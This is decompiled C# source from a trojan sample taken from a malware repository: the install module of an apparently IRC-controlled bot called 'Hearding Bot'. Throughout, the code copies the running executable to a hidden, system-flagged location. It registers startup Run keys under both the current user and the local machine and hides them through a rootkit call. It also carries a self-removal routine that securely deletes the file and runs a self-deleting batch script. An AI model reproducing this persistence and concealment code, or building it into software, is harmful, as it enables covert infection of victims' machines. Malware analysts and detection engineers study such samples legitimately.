// Decompiled with JetBrains decompiler // Type: Hearding_Bot.Install // Assembly: Hearding Bot, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: 931E7B23-EA6E-4139-8BD0-1A4E0BF9E258 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Fsysna.dljm-a7abcca3397d1344b43d53c1427609ca1808f1991c5d2b158fd67c1ea3e6f19a.exe using Microsoft.Win32; using System; using System.Diagnostics; using System.IO; using System.Reflection; namespace Hearding_Bot { internal class Install { public static bool isInstalled { get => File.Exists(Config.installPath + Config.installFile); set { } } public static void install() { Install.regInstall(); RegistryKey currentUser = Registry.CurrentUser; currentUser.CreateSubKey(Config.regInfoPath + "\\" + Config.mutex); RegistryKey registryKey = currentUser.OpenSubKey(Config.regInfoPath + "\\" + Config.mutex, true); registryKey.SetValue("firstRun", (object) true); registryKey.SetValue("iDate", (object) DateTime.Now.ToString()); try { if (!Directory.Exists(Config.installPath)) Directory.CreateDirectory(Config.installPath); File.Copy(Process.GetCurrentProcess().MainModule.FileName, Config.installPath + Config.installFile); if (Config.installFileHidden) File.SetAttributes(Config.installPath + Config.installFile, FileAttributes.Hidden); if (!Config.installFileSystem) return; File.SetAttributes(Config.installPath + Config.installFile, FileAttributes.System); } catch { } } public static void regInstall() { try { foreach (string startupKey in Config.startupKeys) { RegistryKey subKey = Registry.CurrentUser.CreateSubKey(startupKey); subKey.SetValue(Config.startupName, (object) (Config.installPath + Config.installFile)); rootkit.HideRegistryKey(subKey); } foreach (string startupKey in Config.startupKeys) { RegistryKey subKey = Registry.LocalMachine.CreateSubKey(startupKey); subKey.SetValue(Config.startupName, (object) (Config.installPath + Config.installFile)); rootkit.HideRegistryKey(subKey); } } catch { } } public static void uninstall(string startup) { try { RegistryKey registryKey = Registry.CurrentUser.OpenSubKey(Config.regInfoPath + "\\" + Config.mutex, true); registryKey.DeleteValue("firstRun"); registryKey.DeleteValue("iDate"); } catch (Exception ex) { } try { foreach (string startupKey in Config.startupKeys) Registry.CurrentUser.CreateSubKey(startupKey).DeleteValue(Config.startupName); } catch (Exception ex) { } try { foreach (string startupKey in Config.startupKeys) Registry.LocalMachine.CreateSubKey(startupKey).DeleteValue(Config.startupName); } catch (Exception ex) { } try { DeleteFile.SecureDelete(Config.installPath + Config.installFile, 5); Irc.ircClient.Close(); StreamWriter streamWriter = new StreamWriter(Environment.CurrentDirectory + "uninstall.bat"); streamWriter.WriteLine("del " + Config.installPath + Config.installFile); streamWriter.WriteLine("del \"" + Assembly.GetExecutingAssembly().Location + "\""); streamWriter.Close(); Process.Start(Environment.CurrentDirectory + "uninstall.bat"); } catch (Exception ex) { } if (startup != null) { try { Process.Start(startup); } catch (Exception ex) { } } Functions.kill(); } } }